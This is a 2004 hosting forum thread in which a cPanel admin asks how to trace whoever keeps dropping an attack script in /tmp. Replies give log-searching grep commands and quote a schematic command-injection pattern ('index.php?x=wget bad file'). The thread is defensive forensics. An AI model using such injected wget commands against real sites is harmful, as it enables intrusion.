The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

how to track hacker?

Discussion in 'General Discussion' started by 10101, Jun 14, 2004.

  1. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    I keep seeing files like "extrupator.pl" in my tmp folder which are attempts to hack the server.

    I think they are uploaded through a site which has a vunerable script, but I am not sure what commands to run to catch this little sod.

    What lines should i run to find out who uploaded/ran extrupator.pl?
     
  2. AlexSmithMCP

    AlexSmithMCP Well-Known Member

    Joined:
    May 26, 2004
    Messages:
    66
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    u could replace the script with one that logs there IP and
    as well as the hostname it was ran through (i think that can be done) that should help u find them :) make sure it emails it to an off site email address tho....
     
  3. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    16
    that would be cool, where would i get such a script?
     
  4. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,367
    Likes Received:
    5
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
  5. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    16
  6. Ben

    Ben Well-Known Member

    Joined:
    Aug 19, 2002
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    6
    If you are using phpSuExec, then determining the vulnerable site is easy.

    If you aren't, it's harder.

    If you are, run

    ls -la file.pl

    That should tell you the owner of the file.

    Then goto /usr/local/apache/domlogs/ and run

    grep wget `ls | grep username`

    This should then show all instances where attempts to wget a file were logged. This is usually a good indication of a vulnerable script, usually something like

    index.php?x=wget bad file

    What you do with the site from there is up to you.

    If you don't use phpSuExec, then you can run the following, please note that this command can be load intensive and take a while to run

    grep filename.pl *.com

    If no results, proceed to other TLD's on your machine, ex

    grep filename.pl *.net

    That will show you instances where most likely the file was wget'ed, and can also determine the site, yet again, what to do with is up to you.

    HTH,

    Ben
     
  7. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,367
    Likes Received:
    5
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
  8. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    16
Loading...

Share This Page